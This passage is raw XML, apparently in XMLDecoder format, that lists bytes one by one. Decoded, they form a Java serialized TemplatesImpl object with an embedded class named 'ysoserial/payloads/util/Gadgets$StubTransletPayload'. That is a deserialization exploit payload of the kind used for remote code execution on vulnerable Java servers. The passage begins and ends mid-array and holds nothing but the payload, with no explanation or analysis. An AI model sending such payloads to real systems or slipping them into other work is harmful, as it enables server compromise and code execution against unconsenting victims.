index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>110</byte></void><void index=\"260\"><byte>103</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>83</byte></void><void index=\"263\"><byte>116</byte></void><void index=\"264\"><byte>114</byte></void><void index=\"265\"><byte>105</byte></void><void index=\"266\"><byte>110</byte></void><void index=\"267\"><byte>103</byte></void><void index=\"268\"><byte>59</byte></void><void index=\"269\"><byte>76</byte></void><void index=\"270\"><byte>0</byte></void><void index=\"271\"><byte>11</byte></void><void index=\"272\"><byte>95</byte></void><void index=\"273\"><byte>97</byte></void><void index=\"274\"><byte>117</byte></void><void index=\"275\"><byte>120</byte></void><void index=\"276\"><byte>67</byte></void><void index=\"277\"><byte>108</byte></void><void index=\"278\"><byte>97</byte></void><void index=\"279\"><byte>115</byte></void><void index=\"280\"><byte>115</byte></void><void index=\"281\"><byte>101</byte></void><void index=\"282\"><byte>115</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>0</byte></void><void index=\"285\"><byte>59</byte></void><void index=\"286\"><byte>76</byte></void><void index=\"287\"><byte>99</byte></void><void index=\"288\"><byte>111</byte></void><void index=\"289\"><byte>109</byte></void><void index=\"290\"><byte>47</byte></void><void index=\"291\"><byte>115</byte></void><void index=\"292\"><byte>117</byte></void><void index=\"293\"><byte>110</byte></void><void index=\"294\"><byte>47</byte></void><void index=\"295\"><byte>111</byte></void><void index=\"296\"><byte>114</byte></void><void index=\"297\"><byte>103</byte></void><void index=\"298\"><byte>47</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>112</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>99</byte></void><void index=\"303\"><byte>104</byte></void><void index=\"304\"><byte>101</byte></void><void index=\"305\"><byte>47</byte></void><void index=\"306\"><byte>120</byte></void><void index=\"307\"><byte>97</byte></void><void index=\"308\"><byte>108</byte></void><void index=\"309\"><byte>97</byte></void><void index=\"310\"><byte>110</byte></void><void index=\"311\"><byte>47</byte></void><void index=\"312\"><byte>105</byte></void><void index=\"313\"><byte>110</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>101</byte></void><void index=\"316\"><byte>114</byte></void><void index=\"317\"><byte>110</byte></void><void index=\"318\"><byte>97</byte></void><void index=\"319\"><byte>108</byte></void><void index=\"320\"><byte>47</byte></void><void index=\"321\"><byte>120</byte></void><void index=\"322\"><byte>115</byte></void><void index=\"323\"><byte>108</byte></void><void index=\"324\"><byte>116</byte></void><void index=\"325\"><byte>99</byte></void><void index=\"326\"><byte>47</byte></void><void index=\"327\"><byte>114</byte></void><void index=\"328\"><byte>117</byte></void><void index=\"329\"><byte>110</byte></void><void index=\"330\"><byte>116</byte></void><void index=\"331\"><byte>105</byte></void><void index=\"332\"><byte>109</byte></void><void index=\"333\"><byte>101</byte></void><void index=\"334\"><byte>47</byte></void><void index=\"335\"><byte>72</byte></void><void index=\"336\"><byte>97</byte></void><void index=\"337\"><byte>115</byte></void><void index=\"338\"><byte>104</byte></void><void index=\"339\"><byte>116</byte></void><void index=\"340\"><byte>97</byte></void><void index=\"341\"><byte>98</byte></void><void index=\"342\"><byte>108</byte></void><void index=\"343\"><byte>101</byte></void><void index=\"344\"><byte>59</byte></void><void index=\"345\"><byte>91</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>10</byte></void><void index=\"348\"><byte>95</byte></void><void index=\"349\"><byte>98</byte></void><void index=\"350\"><byte>121</byte></void><void index=\"351\"><byte>116</byte></void><void index=\"352\"><byte>101</byte></void><void index=\"353\"><byte>99</byte></void><void index=\"354\"><byte>111</byte></void><void index=\"355\"><byte>100</byte></void><void index=\"356\"><byte>101</byte></void><void index=\"357\"><byte>115</byte></void><void index=\"358\"><byte>116</byte></void><void index=\"359\"><byte>0</byte></void><void index=\"360\"><byte>3</byte></void><void index=\"361\"><byte>91</byte></void><void index=\"362\"><byte>91</byte></void><void index=\"363\"><byte>66</byte></void><void index=\"364\"><byte>91</byte></void><void index=\"365\"><byte>0</byte></void><void index=\"366\"><byte>6</byte></void><void index=\"367\"><byte>95</byte></void><void index=\"368\"><byte>99</byte></void><void index=\"369\"><byte>108</byte></void><void index=\"370\"><byte>97</byte></void><void index=\"371\"><byte>115</byte></void><void index=\"372\"><byte>115</byte></void><void index=\"373\"><byte>116</byte></void><void index=\"374\"><byte>0</byte></void><void index=\"375\"><byte>18</byte></void><void index=\"376\"><byte>91</byte></void><void index=\"377\"><byte>76</byte></void><void index=\"378\"><byte>106</byte></void><void index=\"379\"><byte>97</byte></void><void index=\"380\"><byte>118</byte></void><void index=\"381\"><byte>97</byte></void><void index=\"382\"><byte>47</byte></void><void index=\"383\"><byte>108</byte></void><void index=\"384\"><byte>97</byte></void><void index=\"385\"><byte>110</byte></void><void index=\"386\"><byte>103</byte></void><void index=\"387\"><byte>47</byte></void><void index=\"388\"><byte>67</byte></void><void index=\"389\"><byte>108</byte></void><void index=\"390\"><byte>97</byte></void><void index=\"391\"><byte>115</byte></void><void index=\"392\"><byte>115</byte></void><void index=\"393\"><byte>59</byte></void><void index=\"394\"><byte>76</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>5</byte></void><void index=\"397\"><byte>95</byte></void><void index=\"398\"><byte>110</byte></void><void index=\"399\"><byte>97</byte></void><void index=\"400\"><byte>109</byte></void><void index=\"401\"><byte>101</byte></void><void index=\"402\"><byte>113</byte></void><void index=\"403\"><byte>0</byte></void><void index=\"404\"><byte>126</byte></void><void index=\"405\"><byte>0</byte></void><void index=\"406\"><byte>4</byte></void><void index=\"407\"><byte>76</byte></void><void index=\"408\"><byte>0</byte></void><void index=\"409\"><byte>17</byte></void><void index=\"410\"><byte>95</byte></void><void index=\"411\"><byte>111</byte></void><void index=\"412\"><byte>117</byte></void><void index=\"413\"><byte>116</byte></void><void index=\"414\"><byte>112</byte></void><void index=\"415\"><byte>117</byte></void><void index=\"416\"><byte>116</byte></void><void index=\"417\"><byte>80</byte></void><void index=\"418\"><byte>114</byte></void><void index=\"419\"><byte>111</byte></void><void index=\"420\"><byte>112</byte></void><void index=\"421\"><byte>101</byte></void><void index=\"422\"><byte>114</byte></void><void index=\"423\"><byte>116</byte></void><void index=\"424\"><byte>105</byte></void><void index=\"425\"><byte>101</byte></void><void index=\"426\"><byte>115</byte></void><void index=\"427\"><byte>116</byte></void><void index=\"428\"><byte>0</byte></void><void index=\"429\"><byte>22</byte></void><void index=\"430\"><byte>76</byte></void><void index=\"431\"><byte>106</byte></void><void index=\"432\"><byte>97</byte></void><void index=\"433\"><byte>118</byte></void><void index=\"434\"><byte>97</byte></void><void index=\"435\"><byte>47</byte></void><void index=\"436\"><byte>117</byte></void><void index=\"437\"><byte>116</byte></void><void index=\"438\"><byte>105</byte></void><void index=\"439\"><byte>108</byte></void><void index=\"440\"><byte>47</byte></void><void index=\"441\"><byte>80</byte></void><void index=\"442\"><byte>114</byte></void><void index=\"443\"><byte>111</byte></void><void index=\"444\"><byte>112</byte></void><void index=\"445\"><byte>101</byte></void><void index=\"446\"><byte>114</byte></void><void index=\"447\"><byte>116</byte></void><void index=\"448\"><byte>105</byte></void><void index=\"449\"><byte>101</byte></void><void index=\"450\"><byte>115</byte></void><void index=\"451\"><byte>59</byte></void><void index=\"452\"><byte>120</byte></void><void index=\"453\"><byte>112</byte></void><void index=\"454\"><byte>0</byte></void><void index=\"455\"><byte>0</byte></void><void index=\"456\"><byte>0</byte></void><void index=\"457\"><byte>0</byte></void><void index=\"458\"><byte>-1</byte></void><void index=\"459\"><byte>-1</byte></void><void index=\"460\"><byte>-1</byte></void><void index=\"461\"><byte>-1</byte></void><void index=\"462\"><byte>0</byte></void><void index=\"463\"><byte>116</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>3</byte></void><void index=\"466\"><byte>97</byte></void><void index=\"467\"><byte>108</byte></void><void index=\"468\"><byte>108</byte></void><void index=\"469\"><byte>112</byte></void><void index=\"470\"><byte>117</byte></void><void index=\"471\"><byte>114</byte></void><void index=\"472\"><byte>0</byte></void><void index=\"473\"><byte>3</byte></void><void index=\"474\"><byte>91</byte></void><void index=\"475\"><byte>91</byte></void><void index=\"476\"><byte>66</byte></void><void index=\"477\"><byte>75</byte></void><void index=\"478\"><byte>-3</byte></void><void index=\"479\"><byte>25</byte></void><void index=\"480\"><byte>21</byte></void><void index=\"481\"><byte>103</byte></void><void index=\"482\"><byte>103</byte></void><void index=\"483\"><byte>-37</byte></void><void index=\"484\"><byte>55</byte></void><void index=\"485\"><byte>2</byte></void><void index=\"486\"><byte>0</byte></void><void index=\"487\"><byte>0</byte></void><void index=\"488\"><byte>120</byte></void><void index=\"489\"><byte>112</byte></void><void index=\"490\"><byte>0</byte></void><void index=\"491\"><byte>0</byte></void><void index=\"492\"><byte>0</byte></void><void index=\"493\"><byte>2</byte></void><void index=\"494\"><byte>117</byte></void><void index=\"495\"><byte>114</byte></void><void index=\"496\"><byte>0</byte></void><void index=\"497\"><byte>2</byte></void><void index=\"498\"><byte>91</byte></void><void index=\"499\"><byte>66</byte></void><void index=\"500\"><byte>-84</byte></void><void index=\"501\"><byte>-13</byte></void><void index=\"502\"><byte>23</byte></void><void index=\"503\"><byte>-8</byte></void><void index=\"504\"><byte>6</byte></void><void index=\"505\"><byte>8</byte></void><void index=\"506\"><byte>84</byte></void><void index=\"507\"><byte>-32</byte></void><void index=\"508\"><byte>2</byte></void><void index=\"509\"><byte>0</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>120</byte></void><void index=\"512\"><byte>112</byte></void><void index=\"513\"><byte>0</byte></void><void index=\"514\"><byte>0</byte></void><void index=\"515\"><byte>14</byte></void><void index=\"516\"><byte>29</byte></void><void index=\"517\"><byte>-54</byte></void><void index=\"518\"><byte>-2</byte></void><void index=\"519\"><byte>-70</byte></void><void index=\"520\"><byte>-66</byte></void><void index=\"521\"><byte>0</byte></void><void index=\"522\"><byte>0</byte></void><void index=\"523\"><byte>0</byte></void><void index=\"524\"><byte>50</byte></void><void index=\"525\"><byte>0</byte></void><void index=\"526\"><byte>-70</byte></void><void index=\"527\"><byte>10</byte></void><void index=\"528\"><byte>0</byte></void><void index=\"529\"><byte>3</byte></void><void index=\"530\"><byte>0</byte></void><void index=\"531\"><byte>34</byte></void><void index=\"532\"><byte>7</byte></void><void index=\"533\"><byte>0</byte></void><void index=\"534\"><byte>-72</byte></void><void index=\"535\"><byte>7</byte></void><void index=\"536\"><byte>0</byte></void><void index=\"537\"><byte>37</byte></void><void index=\"538\"><byte>7</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>38</byte></void><void index=\"541\"><byte>1</byte></void><void index=\"542\"><byte>0</byte></void><void index=\"543\"><byte>16</byte></void><void index=\"544\"><byte>115</byte></void><void index=\"545\"><byte>101</byte></void><void index=\"546\"><byte>114</byte></void><void index=\"547\"><byte>105</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>108</byte></void><void index=\"550\"><byte>86</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>114</byte></void><void index=\"553\"><byte>115</byte></void><void index=\"554\"><byte>105</byte></void><void index=\"555\"><byte>111</byte></void><void index=\"556\"><byte>110</byte></void><void index=\"557\"><byte>85</byte></void><void index=\"558\"><byte>73</byte></void><void index=\"559\"><byte>68</byte></void><void index=\"560\"><byte>1</byte></void><void index=\"561\"><byte>0</byte></void><void index=\"562\"><byte>1</byte></void><void index=\"563\"><byte>74</byte></void><void index=\"564\"><byte>1</byte></void><void index=\"565\"><byte>0</byte></void><void index=\"566\"><byte>13</byte></void><void index=\"567\"><byte>67</byte></void><void index=\"568\"><byte>111</byte></void><void index=\"569\"><byte>110</byte></void><void index=\"570\"><byte>115</byte></void><void index=\"571\"><byte>116</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>110</byte></void><void index=\"574\"><byte>116</byte></void><void index=\"575\"><byte>86</byte></void><void index=\"576\"><byte>97</byte></void><void index=\"577\"><byte>108</byte></void><void index=\"578\"><byte>117</byte></void><void index=\"579\"><byte>101</byte></void><void index=\"580\"><byte>5</byte></void><void index=\"581\"><byte>-83</byte></void><void index=\"582\"><byte>32</byte></void><void index=\"583\"><byte>-109</byte></void><void index=\"584\"><byte>-13</byte></void><void index=\"585\"><byte>-111</byte></void><void index=\"586\"><byte>-35</byte></void><void index=\"587\"><byte>-17</byte></void><void index=\"588\"><byte>62</byte></void><void index=\"589\"><byte>1</byte></void><void index=\"590\"><byte>0</byte></void><void index=\"591\"><byte>6</byte></void><void index=\"592\"><byte>60</byte></void><void index=\"593\"><byte>105</byte></void><void index=\"594\"><byte>110</byte></void><void index=\"595\"><byte>105</byte></void><void index=\"596\"><byte>116</byte></void><void index=\"597\"><byte>62</byte></void><void index=\"598\"><byte>1</byte></void><void index=\"599\"><byte>0</byte></void><void index=\"600\"><byte>3</byte></void><void index=\"601\"><byte>40</byte></void><void index=\"602\"><byte>41</byte></void><void index=\"603\"><byte>86</byte></void><void index=\"604\"><byte>1</byte></void><void index=\"605\"><byte>0</byte></void><void index=\"606\"><byte>4</byte></void><void index=\"607\"><byte>67</byte></void><void index=\"608\"><byte>111</byte></void><void index=\"609\"><byte>100</byte></void><void index=\"610\"><byte>101</byte></void><void index=\"611\"><byte>1</byte></void><void index=\"612\"><byte>0</byte></void><void index=\"613\"><byte>15</byte></void><void index=\"614\"><byte>76</byte></void><void index=\"615\"><byte>105</byte></void><void index=\"616\"><byte>110</byte></void><void index=\"617\"><byte>101</byte></void><void index=\"618\"><byte>78</byte></void><void index=\"619\"><byte>117</byte></void><void index=\"620\"><byte>109</byte></void><void index=\"621\"><byte>98</byte></void><void index=\"622\"><byte>101</byte></void><void index=\"623\"><byte>114</byte></void><void index=\"624\"><byte>84</byte></void><void index=\"625\"><byte>97</byte></void><void index=\"626\"><byte>98</byte></void><void index=\"627\"><byte>108</byte></void><void index=\"628\"><byte>101</byte></void><void index=\"629\"><byte>1</byte></void><void index=\"630\"><byte>0</byte></void><void index=\"631\"><byte>18</byte></void><void index=\"632\"><byte>76</byte></void><void index=\"633\"><byte>111</byte></void><void index=\"634\"><byte>99</byte></void><void index=\"635\"><byte>97</byte></void><void index=\"636\"><byte>108</byte></void><void index=\"637\"><byte>86</byte></void><void index=\"638\"><byte>97</byte></void><void index=\"639\"><byte>114</byte></void><void index=\"640\"><byte>105</byte></void><void index=\"641\"><byte>97</byte></void><void index=\"642\"><byte>98</byte></void><void index=\"643\"><byte>108</byte></void><void index=\"644\"><byte>101</byte></void><void index=\"645\"><byte>84</byte></void><void index=\"646\"><byte>97</byte></void><void index=\"647\"><byte>98</byte></void><void index=\"648\"><byte>108</byte></void><void index=\"649\"><byte>101</byte></void><void index=\"650\"><byte>1</byte></void><void index=\"651\"><byte>0</byte></void><void index=\"652\"><byte>4</byte></void><void index=\"653\"><byte>116</byte></void><void index=\"654\"><byte>104</byte></void><void index=\"655\"><byte>105</byte></void><void index=\"656\"><byte>115</byte></void><void index=\"657\"><byte>1</byte></void><void index=\"658\"><byte>0</byte></void><void index=\"659\"><byte>19</byte></void><void index=\"660\"><byte>83</byte></void><void index=\"661\"><byte>116</byte></void><void index=\"662\"><byte>117</byte></void><void index=\"663\"><byte>98</byte></void><void index=\"664\"><byte>84</byte></void><void index=\"665\"><byte>114</byte></void><void index=\"666\"><byte>97</byte></void><void index=\"667\"><byte>110</byte></void><void index=\"668\"><byte>115</byte></void><void index=\"669\"><byte>108</byte></void><void index=\"670\"><byte>101</byte></void><void index=\"671\"><byte>116</byte></void><void index=\"672\"><byte>80</byte></void><void index=\"673\"><byte>97</byte></void><void index=\"674\"><byte>121</byte></void><void index=\"675\"><byte>108</byte></void><void index=\"676\"><byte>111</byte></void><void index=\"677\"><byte>97</byte></void><void index=\"678\"><byte>100</byte></void><void index=\"679\"><byte>1</byte></void><void index=\"680\"><byte>0</byte></void><void index=\"681\"><byte>12</byte></void><void index=\"682\"><byte>73</byte></void><void index=\"683\"><byte>110</byte></void><void index=\"684\"><byte>110</byte></void><void index=\"685\"><byte>101</byte></void><void index=\"686\"><byte>114</byte></void><void index=\"687\"><byte>67</byte></void><void index=\"688\"><byte>108</byte></void><void index=\"689\"><byte>97</byte></void><void index=\"690\"><byte>115</byte></void><void index=\"691\"><byte>115</byte></void><void index=\"692\"><byte>101</byte></void><void index=\"693\"><byte>115</byte></void><void index=\"694\"><byte>1</byte></void><void index=\"695\"><byte>0</byte></void><void index=\"696\"><byte>53</byte></void><void index=\"697\"><byte>76</byte></void><void index=\"698\"><byte>121</byte></void><void index=\"699\"><byte>115</byte></void><void index=\"700\"><byte>111</byte></void><void index=\"701\"><byte>115</byte></void><void index=\"702\"><byte>101</byte></void><void index=\"703\"><byte>114</byte></void><void index=\"704\"><byte>105</byte></void><void index=\"705\"><byte>97</byte></void><void index=\"706\"><byte>108</byte></void><void index=\"707\"><byte>47</byte></void><void index=\"708\"><byte>112</byte></void><void index=\"709\"><byte>97</byte></void><void index=\"710\"><byte>121</byte></void><void index=\"711\"><byte>108</byte></void><void index=\"712\"><byte>111</byte></void><void index=\"713\"><byte>97</byte></void><void index=\"714\"><byte>100</byte></void><void index=\"715\"><byte>115</byte></void><void index=\"716\"><byte>47</byte></void><void index=\"717\"><byte>117</byte></void><void index=\"718\"><byte>116</byte></void><void index=\"719\"><byte>105</byte></void><void index=\"720\"><byte>108</byte></void><void index=\"721\"><byte>47</byte></void><void index=\"722\"><byte>71</byte></void><void index=\"723\"><byte>97</byte></void><void index=\"724\"><byte>100</byte></void><void index=\"725\"><byte>103</byte></void><void index=\"726\"><byte>101</byte></void><void index=\"727\"><byte>116</byte></void><void index=\"728\"><byte>115</byte></void><void index=\"729\"><byte>36</byte></void><void index=\"730\"><byte>83</byte></void><void index=\"731\"><byte>116</byte></void><void index=\"732\"><byte>117</byte></void><void index=\"733\"><byte>98</byte></void><void index=\"734\"><byte>84</byte></void><void index=\"735\"><byte>114</byte></void><void index=\"736\"><byte>97</byte></void><void index=\"737\"><byte>110</byte></void><void index=\"738\"><byte>115</byte></void><void index=\"739\"><byte>108</byte></void><void index=\"740\"><byte>101</byte></void><void index=\"741\"><byte>116</byte></void><void index=\"742\"><byte>80</byte></void><void index=\"743\"><byte>97</byte></void><void index=\"744\"><byte>121</byte></void><void index=\"745\"><byte>108</byte></void><void index=\"746\"><byte>111</byte></void><void index=\"747\"><byte>97</byte></void><void index=\"748\"><byte>100</byte></void><void index=\"749\"><byte>59</byte></void><void index=\"750\"><byte>1</byte></void><void index=\"751\"><byte>0</byte></void><void index=\"752\"><byte>9</byte></void><void index=\"753\"><byte>116</byte></void><void index=\"754\"><byte>114</byte></void><void index=\"755\"><byte>97</byte></void><void index=\"756\"><byte>110</byte></void><void index=\"757\"><byte>115</byte></void><void index=\"758\"><byte>102</byte></void><void index=\"759\"><byte>111</byte></void><void index=\"760\"><byte>114</byte></void><void index=\"761\"><byte>109</byte></void><void index=\"762\"><byte>1</byte></void><void index=\"763\"><byte>0</byte></void><void index=\"764\"><byte>114</byte></void><void index=\"765\"><byte>40</byte></void><void index=\"766\"><byte>76</byte></void><void index=\"767\"><byte>99</byte></void><void index=\"768\"><byte>111</byte></void><void index=\"769\"><byte>109</byte></void><void index=\"770\"><byte>47</byte></void><void index=\"771\"><byte>115</byte></void><void index=\"772\"><byte>117</byte></void><void index=\"773\"><byte>110</byte></void><void index=\"774\"><byte>47</byte></void><void index=\"775\"><byte>111</byte></void><void index=\"776\"><byte>114</byte></void><void index=\"777\"><byte>103</byte></void><void index=\"778\"><byte>47</byte></void><void index=\"779\"><byte>97</byte></void><void index=\"780\"><byte>112</byte></void><void index=\"781\"><byte>97</byte></void><void index=\"782\"><byte>99</byte></void><void index=\"783\"><byte>104</byte></void><void index=\"784\"><byte>101</byte></void><void index=\"785\"><byte>47</byte></void><void index=\"786\"><byte>120</byte></void><void index=\"787\"><byte>97</byte></void><void index=\"788\"><byte>108</byte></void><void index=\"789\"><byte>97</byte></void><void index=\"790\"><byte>110</byte></void><void index=\"791\"><byte>47</byte></void><void index=\"792\"><byte>105</byte></void><void index=\"793\"><byte>110</byte></void><void index=\"794\"><byte>116</byte></void><void index=\"795\"><byte>101</byte></void><void index=\"796\"><byte>114</byte></void><void index=\"797\"><byte>110</byte></void><void index=\"798\"><byte>97</byte></void><void index=\"799\"><byte>108</byte></void><void index=\"800\"><byte>47</byte></void><void index=\"801\"><byte>120</byte></void><void index=\"802\"><byte>115</byte></void><void index=\"803\"><byte>108</byte></void><void index=\"804\"><byte>116</byte></void><void index=\"805\"><byte>99</byte></void><void index=\"806\"><byte>47</byte></void><void index=\"807\"><byte>68</byte></void><void index=\"808\"><byte>79</byte></void><void index=\"809\"><byte>77</byte></void><void index=\"810\"><byte>59</byte></void><void index=\"811\"><byte>91</byte></void><void index=\"812\"><byte>76</byte></void><void index=\"813\"><byte>99</byte></void><void index=\"814\"><byte>111</byte></void><void index=\"815\"><byte>109</byte></void><void index=\"816\"><byte>47</byte></void><void index=\"817\"><byte>115</byte></void><void index=\"818\"><byte>117</byte></void><void index=\"819\"><byte>110</byte></void><void index=\"820\"><byte>47</byte></void><void index=\"821\"><byte>111</byte></void><void index=\"822\"><byte>114</byte></void><void index=\"823\"><byte>103</byte></void><void index=\"824\"><byte>47</byte></void><void index=\"825\"><byte>97</byte></void><void index=\"826\"><byte>112</byte></void><void index=\"827\"><byte>97</byte></void><void index=\"828\"><byte>99</byte></void><void index=\"829\"><byte>104</byte></void><void index=\"830\"><byte>101</byte></void><void index=\"831\"><byte>47</byte></void><void index=\"832\"><byte>120</byte></void><void index=\"833\"><byte>109</byte></void><void index=\"834\"><byte>108</byte></void><void index=\"835\"><byte>47</byte></void><void index=\"836\"><byte>105</byte></void><void index=\"837\"><byte>110</byte></void><void index=\"838\"><byte>116</byte></void><void index=\"839\"><byte>101</byte></void><void index=\"840\"><byte>114</byte></void><void index=\"841\"><byte>110</byte></void><void index=\"842\"><byte>97</byte></void><void index=\"843\"><byte>108</byte></void><void index=\"844\"><byte>47</byte></void><void index=\"845\"><byte>115</byte></void><void index=\"846\"><byte>101</byte></void><void index=\"847\"><byte>114</byte></void><void index=\"848\"><byte>105</byte></void><void index=\"849\"><byte>97</byte></void><void index=\"850\"><byte>108</byte></void><void index=\"851\"><byte>105</byte></void><void index=\"852\"><byte>122</byte></void><void index=\"853\"><byte>101</byte></void><void index=\"854\"><byte>114</byte></void><void index=\"855\"><byte>47</byte></void><void index=\"856\"><byte>83</byte></void><void index=\"857\"><byte>101</byte></void><void index=\"858\"><byte>114</byte></void><void index=\"859\"><byte>105</byte></void><void index=\"860\"><byte>97</byte></void><void index=\"861\"><byte>108</byte></void><void index=\"862\"><byte>105</byte></void><void index=\"863\"><byte>122</byte></void><void index=\"864\"><byte>97</byte></void><void index=\"865\"><byte>116</byte></void><void index=\"866\"><byte>105</byte></void><void index=\"867\"><byte>111</byte></void><void index=\"868\"><byte>110</byte></void><void index=\"869\"><byte>72</byte></void><void index=\"870\"><byte>97</byte></void><void index=\"871\"><byte>110</byte></void><void index=\"872\"><byte>100</byte></void><void index=\"873\"><byte>108</byte></void><void index=\"874\"><byte>101</byte></void><void index=\"875\"><byte>114</byte></void><void index=\"876\"><byte>59</byte></void><void index=\"877\"><byte>41</byte></void><void index=\"878\"><byte>86</byte></void><void index=\"879\"><byte>1</byte></void><void index=\"880\"><byte>0</byte></void><void index=\"881\"><byte>8</byte></void><void index=\"882\"><byte>100</byte></void><void index=\"883\"><byte>111</byte></void><void index=\"884\"><byte>99</byte></void><void index=\"885\"><byte>117</byte></void><void index=\"886\"><byte>109</byte></void><void index=\"887\"><byte>101</byte></void><void index=\"888\"><byte>110</byte></void><void index=\"889\"><byte>116</byte></void><void index=\"890\"><byte>1</byte></void><void index=\"891\"><byte>0</byte></void><void index=\"892\"><byte>45</byte></void><void index=\"893\"><byte>76</byte></void><void index=\"894\"><byte>99</byte></void><void index=\"895\"><byte>111</byte></void><void index=\"896\"><byte>109</byte></void><void index=\"897\"><byte>47</byte></void><void index=\"898\"><byte>115</byte></void><void index=\"899\"><byte>117</byte></void><void index=\"900\"><byte>110</byte></void><void index=\"901\"><byte>47</byte></void><void index=\"902\"><byte>111</byte></void><void index=\"903\"><byte>114</byte></void><void index=\"904\"><byte>103</byte></void><void index=\"905\"><byte>47</byte></void><void index=\"906\"><byte>97</byte></void><void index=\"907\"><byte>112</byte></void><void index=\"908\"><byte>97</byte></void><void index=\"909\"><byte>99</byte></void><void index=\"910\"><byte>104</byte></void><void index=\"911\"><byte>101</byte></void><void index=\"912\"><byte>47</byte></void><void index=\"913\"><byte>120</byte></void><void index=\"914\"><byte>97</byte></void><void index=\"915\"><byte>108</byte></void><void index=\"916\"><byte>97</byte></void><void index=\"917\"><byte>110</byte></void><void index=\"918\"><byte>47</byte></void><void index=\"919\"><byte>105</byte></void><void index=\"920\"><byte>110</byte></void><void index=\"921\"><byte>116</byte></void><void index=\"922\"><byte>101</byte></void><void index=\"923\"><byte>114</byte></void><void index=\"924\"><byte>110</byte></void><void index=\"925\"><byte>97</byte></void><void index=\"926\"><byte>108</byte></void><void index=\"927\"><byte>47</byte></void><void index=\"928\"><byte>120</byte></void><void index=\"929\"><byte>115</byte></void><void index=\"930\"><byte>108</byte></void><void index=\"931\"><byte>116</byte></void><void index=\"932\"><byte>99</byte></void><void index=\"933\"><byte>47</byte></void><void index=\"934\"><byte>68</byte></void><void index=\"935\"><byte>79</byte></void><void index=\"936\"><byte>77</byte></void><void index=\"937\"><byte>59</byte></void><void index=\"938\"><byte>1</byte></void><void index=\"939\"><byte>0</byte></void><void index=\"940\"><byte>8</byte></void><void index=\"941\"><byte>104</byte></void><void index=\"942\"><byte>97</byte></void><void index=\"943\"><byte>110</byte></void><void index=\"944\"><byte>100</byte></void><void index=\"945\"><byte>108</byte></void><void index=\"946\"><byte>101</byte></void><void index=\"947\"><byte>114</byte></void><void index=\"948\"><byte>115</byte></void><void index=\"949\"><byte>1</byte></void><void index=\"950\"><byte>0</byte></void><void index=\"951\"><byte>66</byte></void><void index=\"952\"><byte>91</byte></void><void index=\"953\"><byte>76</byte></void><void index=\"954\"><byte>99</byte></void><void index=\"955\"><byte>111</byte></void><void index=\"956\"><byte>109</byte></void><void index=\"957\"><byte>47</byte></void><void index=\"958\"><byte>115</byte></void><void index=\"959\"><byte>117</byte></void><void index=\"960\"><byte>110</byte></void><void index=\"961\"><byte>47</byte></void><void index=\"962\"><byte>111</byte></void><void index=\"963\"><byte>114</byte></void><void index=\"964\"><byte>103</byte></void><void index=\"965\"><byte>47</byte></void><void index=\"966\"><byte>97</byte></void><void index=\"967\"><byte>112</byte></void><void index=\"968\"><byte>97</byte></void><void index=\"969\"><byte>99</byte></void><void index=\"970\"><byte>104</byte></void><void index=\"971\"><byte>101</byte></void><void index=\"972\"><byte>47</byte></void><void index=\"973\"><byte>120</byte></void><void index=\"974\"><byte>109</byte></void><void index=\"975\"><byte>108</byte></void><void index=\"976\"><byte>47</byte></void><void index=\"977\"><byte>105</byte></void><void index=\"978\"><byte>110</byte></void><void index=\"979\"><byte>116</byte></void><void index=\"980\"><byte>101</byte></void><void index=\"981\"><byte>114</byte></void><void index=\"982\"><byte>110</byte></void><void index=\"983\"><byte>97</byte></void><void index=\"984\"><byte>108</byte></void><void index=\"985\"><byte>47</byte></void><void index=\"986\"><byte>115</byte></void><void index=\"987\"><byte>101</byte></void><void index=\"988\"><byte>114</byte></void><void index=\"989\"><byte>105</byte></void><void index=\"990\"><byte>97</byte></void><void index=\"991\"><byte>108</byte></void><void index=\"992\"><byte>105</byte></void><void index=\"993\"><byte>122</byte></void><void index=\"994\"><byte>101</byte></void><void index=\"995\"><byte>114</byte></void><void index=\"996\"><byte>47</byte></void><void index=\"997\"><byte>83</byte></void><void index=\"998\"><byte>101</byte></void><void index=\"999\"><byte>114</byte></void><void index=\"1000\"><byte>105</byte></void><void index=\"1001\"><byte>97</byte></void><void index=\"1002\"><byte>108</byte></void><void index=\"1003\"><byte>105</byte></void><void index=\"1004\"><byte>122</byte></void><void index=\"1005\"><byte>97</byte></void><void index=\"1006\"><byte>116</byte></void><void index=\"1007\"><byte>105</byte></void><void index=\"1008\"><byte>111</byte></void><void index=\"1009\"><byte>110</byte></void><void index=\"1010\"><byte>72</byte></void><void index=\"1011\"><byte>97</byte></void><void index=\"1012\"><byte>110</byte></void><void index=\"1013\"><byte>100</byte></void><void index=\"1014\"><byte>108</byte></void><void index=\"1015\"><byte>101</byte></void><void index=\"1016\"><byte>114</byte></void><void index=\"1017\"><byte>59</byte></void><void index=\"1018\"><byte>1</byte></void><void index=\"1019\"><byte>0</byte></void><void index=\"1020\"><byte>10</byte></void><void index=\"1021\"><byte>69</byte></void><void index=\"1022\"><byte>120</byte></void><void index=\"1023\"><byte>99</byte></void><void index=\"1024\"><byte>101</byte></void><void index=\"1025\"><byte>112</byte></void><void index=\"1026\"><byte>116</byte></void><void index=\"1027\"><byte>105</byte></void><void index=\"1028\"><byte>111</byte></void><void index=\"1029\"><byte>110</byte></void><void index=\"1030\"><byte>115</byte></void><void index=\"1031\"><byte>7</byte></void><void index=\"1032\"><byte>0</byte></void><void index=\"1033\"><byte>39</byte></void><void index=\"1034\"><byte>1</byte></void><void index=\"1035\"><byte>0</byte></void><void index=\"1036\"><byte>-90</byte></void><void index=\"1037\"><byte>40</byte></void><void index=\"1038\"><byte>76</byte></void><void index=\"1039\"><byte>99</byte></void><void index=\"1040\"><byte>111</byte></void><void index=\"1041\"><byte>109</byte></void><void index=\"1042\"><byte>47</byte></void><void 